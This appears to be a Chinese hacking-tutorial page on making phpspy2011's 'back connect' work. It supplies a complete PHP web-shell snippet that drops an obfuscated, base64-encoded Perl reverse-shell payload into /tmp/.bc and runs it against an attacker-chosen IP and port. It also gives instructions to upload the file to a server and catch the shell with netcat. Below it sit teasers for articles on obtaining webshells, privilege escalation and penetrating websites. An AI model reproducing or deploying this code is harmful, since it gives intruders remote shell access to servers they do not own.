phpspy2011怎么反弹back connect?反弹代码的使用方法是什么?
phpspy2011 中的 Back Connect 怎么弄都不能反弹回来,在网上找了段代码,测试成功了,但自己看了下,这段代码貌似也是从 phpspy 中分离出来的
使用方法:需要将以下代码保存为一个单独的php文件。上传到服务器之后,本地NC监听一个端口,在代码里设置好反弹IP和端口,然后直接访问上传的php文件,就会给 NC 弹回来一个shell。
测试实例:先在本地执行 nc -vv -l -p port,然后访问这个php页面 http://www.site.com/phpdkft.php ,本地就会得到一个反弹的shell。
这样每次可以直接访问这个php页面,直接弹回来shell,不用做其他繁琐的操作,下面贴出来已经修改好的代码
复制代码
代码如下:
function which($pr) {
$path = execute("which $pr");
return ($path ? $path : $pr);
}
function execute($cfe) {
$res = '';
if ($cfe) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("\n",$res);
} elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
$yourip = "your IP";
$yourport = 'your port';
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>
websql安全风险详析 websql攻击的防御之道
一、WebSQL安全风险简介数据库安全一直是后端人员广泛关注和需要预防的问题。但是自从HTML5引入本地数据库和WebSQL之后,前端开发对于数据库的安全也必须要有所了解和警惕。WebSQL的安全问题通常表现为两个部分:
详情2018-02-08 09:37:00责编:llp 来源:驱动管家怎么获取webshell?得到webshell获取网站控制权的十大方法
黑客在入侵企业网站时,通常要通过各种方式获取webshell从而获得企业网站的控制权,然后方便进行之后的入侵行为。本篇文章将如何获取webshell总结成为了十种方法,希望广大的企业网络管理员能够通过了解获取websh
详情2018-01-17 15:24:21责编:llp 来源:驱动管家pcanywhere提权有哪些方法?
在早期的入侵提权中,我们经常可以看到使用利用安装PcAnywhere的服务器下载cif文件,然后使用明小子或者其他专用的密码读取工具进行读取控制密码的提权方法。这个应该算是PcAnywhere的一个硬伤了。而通常这个文件
详情2018-01-17 11:34:17责编:llp 来源:驱动管家如何渗透台湾视频网站?这里有份攻略
----------------------------------------------------------------------------------------------------------No 1文章背景:
详情2018-01-28 11:39:26责编:llp 来源:驱动管家log备份不能闭合 log备份的闭合问题如何解决?
但是在LOG备份中,我们经常会
详情2018-02-24 15:08:35责编:llp 来源:驱动管家efs加密是什么?怎么查看系统中其他人使用efs加密过的文件?
EFS(Encrypting File System,加密文件系统)加密是一种基于NTFS磁盘技术的加密技术。EFS加密基于公钥策略。在使用EFS加密一个文件或文件夹时,系统首先会生成一个由伪随机数组成的FEK(File Encryption Key,
详情2018-02-11 20:25:52责编:llp 来源:驱动管家自动sql射入工具sqlmap注入技巧介绍
sqlmap 是一个自动SQL 射入工具。本文收集了一些利用Sqlmap做注入测试的TIPS,其中也包含一点绕WAF的技巧,便于大家集中查阅,欢迎补充、分享。TIP1当我们注射的时候,判断注入http: site script?id=10 http:
详情2018-01-22 10:11:07责编:llp 来源:驱动管家web和数据库服务器数据分离有哪些情况?这些情况如何解决?
前言:在我们入侵的过程中,很多人会遇到这种情况,拿到一个sa权限或是db_owner权限的注入点,但是数据库和web数据是两台分离的服务器,也就是没有在同一台服务器上。有些是sa权限的注入点,我们当然可以直接执行
详情2018-02-23 19:08:51责编:llp 来源:驱动管家怎么让u盘代替windows系统的密码?
【赛迪网-IT技术报道】U盘 如今可以说非常普及了,不过,如果只是把它用来存储数据的话,也许有点可惜了。其实,我们还可以让U盘发挥更大的能量!今天小编教你一招,能让你的U盘代 替登录系统的密码,只有当你插上U盘才能正常进入系统操作,否则任何操作都无法进入系统。
详情2018-01-17 20:08:26责编:llp 来源:驱动管家终端dlp工具对安全的作用 dlp工具的限制
企业数据的共享从来都不是那么简单。员工可以用邮件添加附件,在云上同步文件,用闪存拷贝几个GB的数据,从外部访问网络上资源等等。这样的优点在于提高了生产力和工作的灵活性。不足就是IT对敏感数据的保护更为
详情2018-02-11 18:05:45责编:llp 来源:驱动管家
- 杜比音效驱动有什么用?win8.1如何安装杜比音效驱动
- Ghost系统有哪些缺点?Ghost系统怎么安装显卡驱动
- 利用压缩工具WinRAR就可以轻松清理你的电脑桌面了
- 如何分卷压缩?分卷压缩用这个方法操作最快速
- 夜市摄像头怎么安装?安装夜市摄像头的步骤详解
- 宏碁笔记本电脑的内置网络摄像头怎么使用
- Intel H370 B360 H310主板发售时间将在4月初
- 阿里大数据:中老年人网络消费能力达到了5000元每年
- 电脑装KB3146706后出现蓝屏代码0x0000006b是什么原因?
- 吃鸡配置是什么?懂得这些吃鸡配置帮你玩转吃鸡
- 天语w700怎么刷机?天语w700刷机的注意事项
- 如何打开红米3s的勿扰模式?红米3s开启勿扰模式的方法
- free realty v3.1-0.6多重网络漏洞
- 过d盾php一句话木马是什么?如何快速防御?
- 驱动程序能不能还原版本?win7系统怎么还原
- 安装显卡驱动后电脑花屏了怎么办?试试这个方法
- 压缩文件打不开的问题其实可以这样处理
- rar压缩软件使用的时候经常弹出广告怎么禁止
- 摄像头监控系统其实这样安装最简单
- 红外线摄像头夜视效果不好的问题可以这样调节